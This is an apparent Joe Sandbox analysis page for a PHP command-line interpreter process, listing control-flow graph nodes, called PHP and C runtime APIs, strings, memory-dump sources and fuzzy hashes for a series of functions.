7ff7498c24d0-7ff7498c24d7 1065->1066 1065->1067 1066->1064 1071 7ff7498c24d9-7ff7498c24e6 1066->1071 1072 7ff7498c2526-7ff7498c2536 php_printf 1067->1072 1073 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 1067->1073 1069 7ff7498c25c5-7ff7498c264f php_request_startup 1068->1069 1070 7ff7498c259c-7ff7498c259f 1068->1070 1077 7ff7498c2651-7ff7498c2664 php_output_write 1069->1077 1078 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 1069->1078 1070->1069 1076 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 1070->1076 1079 7ff7498c24f4-7ff7498c2502 1071->1079 1080 7ff7498c24e8-7ff7498c24ec 1071->1080 1081 7ff7498c266a-7ff7498c2694 sapi_deactivate zend_ini_deactivate 1072->1081 1074 7ff7498c2564-7ff7498c2574 _strdup 1073->1074 1075 7ff7498c2578-7ff7498c2586 1073->1075 1074->1075 1082 7ff7498c25c1 1075->1082 1076->1082 1077->1081 1085 7ff7498c273b-7ff7498c2773 zend_is_auto_global 1078->1085 1086 7ff7498c26fb-7ff7498c26ff 1078->1086 1079->1064 1080->1079 1084 7ff7498c24ee-7ff7498c24f2 1080->1084 1081->1048 1082->1069 1084->1064 1084->1079 1087 7ff7498c23ef-7ff7498c2406 1085->1087 1088 7ff7498c2779-7ff7498c2789 1085->1088 1086->1085 1089 7ff7498c2701-7ff7498c2709 1086->1089 1087->1048 1088->1055 1091 7ff7498c2710-7ff7498c271a 1089->1091 1092 7ff7498c2720-7ff7498c2728 1091->1092 1092->1092 1093 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 1092->1093 1093->1085 1093->1091
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpid_strdupfflushfprintffreeopen_file_for_scanningphp_get_highlight_structphp_printfphp_request_shutdownsapi_deactivatevirtual_cwd_activatevirtual_fopenvirtual_realpathzend_destroy_file_handlezend_highlightzend_ini_deactivatezend_stream_init_fp
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 177613051-4259897058
                                                • Opcode ID: ac70d1cb09c4a103e01a0aba658b53caf54f70a4db69a60423943230d4c2490e
                                                • Instruction ID: efcc86b1407b657872a18da43171f8a28f9ebddfbca728e48b8b7de120aee67e
                                                • Opcode Fuzzy Hash: ac70d1cb09c4a103e01a0aba658b53caf54f70a4db69a60423943230d4c2490e
                                                • Instruction Fuzzy Hash: 5741E532A0CB42C6EB54BF29E854279B7B8FB44B44F944135DA4E427A8DF3CE864D720
                                                Function 00007FF7498C202E Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1096 7ff7498c202e-7ff7498c2032 1097 7ff7498c2275-7ff7498c22b6 php_getopt 1096->1097 1098 7ff7498c2038-7ff7498c2043 1096->1098 1099 7ff7498c1d80-7ff7498c1d86 1097->1099 1100 7ff7498c22bc-7ff7498c22de 1097->1100 1098->1097 1099->1097 1101 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 1099->1101 1103 7ff7498c22e0 1100->1103 1104 7ff7498c231c-7ff7498c231f 1100->1104 1110 7ff7498c240e-7ff7498c2413 1101->1110 1105 7ff7498c22e7-7ff7498c22ee 1103->1105 1107 7ff7498c2321-7ff7498c232d php_win32_console_is_own 1104->1107 1108 7ff7498c237b 1104->1108 1105->1105 1109 7ff7498c22f0-7ff7498c2317 php_output_write 1105->1109 1111 7ff7498c232f-7ff7498c2332 1107->1111 1112 7ff7498c236c-7ff7498c2379 1107->1112 1113 7ff7498c237f-7ff7498c2382 1108->1113 1114 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 1109->1114 1116 7ff7498c241f-7ff7498c2425 1110->1116 1117 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 1110->1117 1111->1112 1115 7ff7498c2334-7ff7498c2337 1111->1115 1112->1113 1118 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 1113->1118 1119 7ff7498c23a8-7ff7498c23ad 1113->1119 1114->1110 1123 7ff7498c2339-7ff7498c2340 1115->1123 1124 7ff7498c235d-7ff7498c236a 1115->1124 1125 7ff7498c242f-7ff7498c2436 1116->1125 1126 7ff7498c2427-7ff7498c2429 php_request_shutdown 1116->1126 1117->1116 1118->1119 1121 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 1119->1121 1122 7ff7498c23e6-7ff7498c23ea 1119->1122 1141 7ff7498c24c2 1121->1141 1129 7ff7498c24c6-7ff7498c24c9 1122->1129 1123->1124 1130 7ff7498c2342-7ff7498c234f 1123->1130 1124->1113 1131 7ff7498c2441-7ff7498c2446 1125->1131 1132 7ff7498c2438-7ff7498c243b free 1125->1132 1126->1125 1136 7ff7498c2506-7ff7498c2509 1129->1136 1137 7ff7498c24cb-7ff7498c24ce 1129->1137 1130->1112 1138 7ff7498c2351-7ff7498c2355 1130->1138 1133 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 1131->1133 1134 7ff7498c244c-7ff7498c2455 _getpid 1131->1134 1132->1131 1134->1133 1139 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 1134->1139 1143 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 1136->1143 1145 7ff7498c2588-7ff7498c259a 1136->1145 1142 7ff7498c24d0-7ff7498c24d7 1137->1142 1137->1143 1138->1112 1144 7ff7498c2357-7ff7498c235b 1138->1144 1139->1141 1141->1129 1142->1136 1150 7ff7498c24d9-7ff7498c24e6 1142->1150 1151 7ff7498c2526-7ff7498c2536 php_printf 1143->1151 1152 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 1143->1152 1144->1112 1144->1124 1147 7ff7498c25c5-7ff7498c264f php_request_startup 1145->1147 1148 7ff7498c259c-7ff7498c259f 1145->1148 1157 7ff7498c2651-7ff7498c2664 php_output_write 1147->1157 1158 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 1147->1158 1148->1147 1156 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 1148->1156 1159 7ff7498c24f4-7ff7498c2502 1150->1159 1160 7ff7498c24e8-7ff7498c24ec 1150->1160 1161 7ff7498c266a 1151->1161 1153 7ff7498c2564-7ff7498c2574 _strdup 1152->1153 1154 7ff7498c2578-7ff7498c2586 1152->1154 1153->1154 1162 7ff7498c25c1 1154->1162 1156->1162 1157->1161 1164 7ff7498c273b-7ff7498c2773 zend_is_auto_global 1158->1164 1165 7ff7498c26fb-7ff7498c26ff 1158->1165 1159->1136 1160->1159 1163 7ff7498c24ee-7ff7498c24f2 1160->1163 1161->1114 1162->1147 1163->1136 1163->1159 1166 7ff7498c23ef-7ff7498c2406 1164->1166 1167 7ff7498c2779-7ff7498c2789 1164->1167 1165->1164 1168 7ff7498c2701-7ff7498c2709 1165->1168 1166->1110 1167->1133 1170 7ff7498c2710-7ff7498c271a 1168->1170 1171 7ff7498c2720-7ff7498c2728 1170->1171 1171->1171 1172 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 1171->1172 1172->1164 1172->1170
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 3553338152-4259897058
                                                • Opcode ID: 6d54f0acc1ee76f4485067c6dbf453e35cee6cdff82eb98f872bc53b249bfa8a
                                                • Instruction ID: 1c8a25662710b93503582356918078a0e669bd8060c6a3247cb13f0d8afb5878
                                                • Opcode Fuzzy Hash: 6d54f0acc1ee76f4485067c6dbf453e35cee6cdff82eb98f872bc53b249bfa8a
                                                • Instruction Fuzzy Hash: CF511632A0CB42C6EB54BF29E444269B7B8FB44B94F944136DA4E437A8CF3CE464C720
                                                Function 00007FF7498C222B Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: 525ae0eb10930a3505e2517b51df5a8cd0162de87376be0806038f6245af0f10
                                                • Instruction ID: bf40580b41a665f66e603cdb1f5f050edbb9e8ee5d4878c3007d4bdd15b0c8fd
                                                • Opcode Fuzzy Hash: 525ae0eb10930a3505e2517b51df5a8cd0162de87376be0806038f6245af0f10
                                                • Instruction Fuzzy Hash: AB510832A0CB42C6E754BF69E444269B7B8FB44B94F944135DA4E437A8CF3CE464D720
                                                Function 00007FF7498C2242 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: 6143378ca0428e450cd900715ae6fa06231304171325d6e11f2286a64efb4e43
                                                • Instruction ID: 5cad7bb5373e4abec04d290284c9c5523f0bb5af9382d3aebb71771468c5d251
                                                • Opcode Fuzzy Hash: 6143378ca0428e450cd900715ae6fa06231304171325d6e11f2286a64efb4e43
                                                • Instruction Fuzzy Hash: 20510732A0CB42C6EB54BF69E444269B7B8FB44B94F944136DA4E437A8CF3CE464D720
                                                Function 00007FF7498C21E6 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: e1a9e1359cf5cad40f8b8df73d477b35c60c4717a7ec2d5480bceb5a937f2db5
                                                • Instruction ID: 943bfb065064e56453daf8df64c7026f031c9077acf5fadacd6e5ad6a4e33721
                                                • Opcode Fuzzy Hash: e1a9e1359cf5cad40f8b8df73d477b35c60c4717a7ec2d5480bceb5a937f2db5
                                                • Instruction Fuzzy Hash: FD510732A0CB42C6EB54BF69E444269B7B8FB44B94F944136DA4E537A8CF3CE464D720
                                                Function 00007FF7498C2214 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: 9218e46d3a4c7e09d4acfa8916fffc3c79c1739510ff5da9eee1b1ba186f1300
                                                • Instruction ID: 999e8af8ab05720109094272db08dc7a404aa6865e56f1e9a5b5a504142a0f62
                                                • Opcode Fuzzy Hash: 9218e46d3a4c7e09d4acfa8916fffc3c79c1739510ff5da9eee1b1ba186f1300
                                                • Instruction Fuzzy Hash: 4A510732A0CB42C6EB54BF69E444269B7B8FB44B94F944136DA4E437A8CF3CE464D720
                                                Function 00007FF7498C21FD Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: c441f781a3f2e7fcfee351602fa74d73ccd1fddc9563abb88a5ce4646694a6e8
                                                • Instruction ID: dfc948ccc1ccde4adc183dd72ce6950a91820e3d3d5a6f174a645b384e8badfa
                                                • Opcode Fuzzy Hash: c441f781a3f2e7fcfee351602fa74d73ccd1fddc9563abb88a5ce4646694a6e8
                                                • Instruction Fuzzy Hash: 9E510732A0CB42C6EB54BF69E444269B7B8FB44B94F944136DA4E437A8CF3CE464D720
                                                Function 00007FF7498C2259 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: 3848285235c1627fe79e923a606bd2e675f1e66757d41223d7de2e318ad898cb
                                                • Instruction ID: 3e94fc263c2282f2e0d3de2e120ea22c577e6e4f78c4f0444083f7471dc475c6
                                                • Opcode Fuzzy Hash: 3848285235c1627fe79e923a606bd2e675f1e66757d41223d7de2e318ad898cb
                                                • Instruction Fuzzy Hash: 6E510832A0CB42C6EB54BF69E444269B7B8FB44B94F944536DA4E437A8CF3CE464D720
                                                Function 00007FF7498C21DC Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 115COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$fflush$fprintfphp_getoptphp_output_writephp_printfphp_request_shutdownphp_win32_console_is_ownprintfsapi_deactivatevirtual_cwd_activatevirtual_fopenzend_destroy_file_handlezend_ini_deactivatezend_is_auto_globalzend_register_bool_constant
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1243356579-4259897058
                                                • Opcode ID: 375e325812b55d1bcc3cf7a7f965873d10f6e755133bc88264a4c209ae73991f
                                                • Instruction ID: 34051c189341323700d86667cc5217b4bccef9985bd76c2b9da3fa85622c19ef
                                                • Opcode Fuzzy Hash: 375e325812b55d1bcc3cf7a7f965873d10f6e755133bc88264a4c209ae73991f
                                                • Instruction Fuzzy Hash: DA510832A0CB42C6EB54BF69E444269B7B8FB44B94F944136DA4E437A8CF3CE464D720
                                                Function 00007FF7498C278E Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpid_strdupfflushfprintffreeopen_file_for_scanningphp_printfphp_request_shutdownsapi_deactivatevirtual_cwd_activatevirtual_fopenvirtual_realpathzend_destroy_file_handlezend_ini_deactivatezend_stream_init_fpzend_strip
                                                • String ID: Could not open input file: %s$Finished execution, repeating...
                                                • API String ID: 1824308970-4259897058
                                                • Opcode ID: bc30af71d3d4de4b2f806a6d90d3efcff2e60aa20fa675fa07f5427c5e754180
                                                • Instruction ID: f2c02878b89e1c4724183ecb7abce70c16ee5847c248199f941d49e4fe763590
                                                • Opcode Fuzzy Hash: bc30af71d3d4de4b2f806a6d90d3efcff2e60aa20fa675fa07f5427c5e754180
                                                • Instruction Fuzzy Hash: AD410622A0CB42C6E754BF29E854279B7B8FB44B84F944135DA4E437A8DF3CE864D720
                                                Function 00007FF7498C1900 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 106COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _php_stream_free_php_stream_open_wrapper_exzend_register_constant
                                                • String ID: STDERR$STDIN$STDOUT$php://stderr$php://stdin$php://stdout
                                                • API String ID: 3934693553-2640790700
                                                • Opcode ID: 4267e5853ad279fd12b8117adbdccc7bc263f0a3bc04d57c20377e3dce11e3d5
                                                • Instruction ID: 4b0a005ae61ac840a655d7641e20ec903cc6de3b459e4d6d27fa4125fda07175
                                                • Opcode Fuzzy Hash: 4267e5853ad279fd12b8117adbdccc7bc263f0a3bc04d57c20377e3dce11e3d5
                                                • Instruction Fuzzy Hash: A7512732A1DB46C2EB50BF19E458A69B7B8FB44B84F844131DA8D03B64DF7CE469CB10
                                                Function 00007FF7498C32A0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 143COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • html_errors=0register_argc_argv=1implicit_flush=1output_buffering=0max_execution_time=0max_input_time=-1, xrefs: 00007FF7498C3314
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: free$FreeLocalexitphp_ini_builder_prependphp_module_shutdownphp_win32_cp_cli_do_restoresapi_shutdownsapi_startuptsrm_shutdown
                                                • String ID: html_errors=0register_argc_argv=1implicit_flush=1output_buffering=0max_execution_time=0max_input_time=-1
                                                • API String ID: 3326966299-87643557
                                                • Opcode ID: 4ebc085102a416455d69f64ef736fa800ecfdd36669855039c8035c4adac4222
                                                • Instruction ID: 2441d41a8c801c9df337b8ad7de1c948b672992221268988297880afdfb05f25
                                                • Opcode Fuzzy Hash: 4ebc085102a416455d69f64ef736fa800ecfdd36669855039c8035c4adac4222
                                                • Instruction Fuzzy Hash: 2A41313260D782CAE712BF38E4542ADBBB4FB45B54F844076CA8D47296CF3DA469D720
                                                Function 00007FF7498CBFEC Relevance: 15.1, APIs: 10, Instructions: 102COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                • String ID:
                                                • API String ID: 3019265742-0
                                                • Opcode ID: 0b51e11ed76521ded2dc44554ca0a3edc73af59089158bb7bcb4175d26705f2c
                                                • Instruction ID: 333af7c6c08cb00ab3b2a598237349fd858ce53a6059f99ee53b6a888b87f945
                                                • Opcode Fuzzy Hash: 0b51e11ed76521ded2dc44554ca0a3edc73af59089158bb7bcb4175d26705f2c
                                                • Instruction Fuzzy Hash: 06315621A0D342C1EB10BF2DD4113B9E2B9AF66784FC44839EA4D476D3CF2DA4698260
                                                Function 00007FF7498CBF00 Relevance: 4.6, APIs: 3, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00007FF7498CC20C: _initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FF7498CBF34), ref: 00007FF7498CC246
                                                • _RTC_Initialize.LIBCMT ref: 00007FF7498CBF38
                                                • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF7498CBF84
                                                • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7498CBF92
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
